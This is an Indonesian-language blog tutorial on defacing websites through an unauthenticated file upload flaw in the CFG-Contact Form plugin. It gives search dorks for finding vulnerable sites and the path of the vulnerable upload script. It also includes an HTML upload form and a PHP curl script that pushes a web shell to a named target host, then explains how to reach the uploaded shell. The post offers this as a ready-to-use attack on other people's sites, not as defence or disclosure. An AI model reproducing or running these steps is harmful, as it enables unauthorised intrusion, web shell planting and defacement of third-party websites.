Header Ads

Deface Menggunakan CFG-Contact Form Vulnerability File Upload



kali ini saya mau share tutorial mengenai salah satu teknik deface yang di buat oleh  member dari team Indonesian Cyber Freedom. Oke Langsung aja .


#Dork: 


"/cfg-contactform-1/"
"/cfg-contactform-2/"

 
Cari target dengan dork diatas




Pilih salah satu target dan masukan Exploit dibawah ini

# Exploit tergantung contact form yang keberapa agan pilih


www.site.com/[path]/cfg-contactform-1/inc/upload.php


Kalau ada mantra ajaib blablabla {"filename":"blabla"} itu berarti vuln
lalu upload shell dengan CSRF

CSRF :
 
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
 
Versi PHP
 
<?php

$uploadfile="shell.php";

$ch = curl_init("hurt.co.li/path/cfg-contactform-1/inc/upload.php
?folder=/cfg-contactform/upload/&fileext=php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
Copy dan simpan dengan script diatas dengan nama 1.html

Kalau sukses nanti ada tulisan ["filename":"shell.php"]

#Acces Shell : www.target.co.li/[path]/cfg-contactform-1/upload/namashell.php [tergantung dork yg lu pake]


Semoga bermanfaat

No comments

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.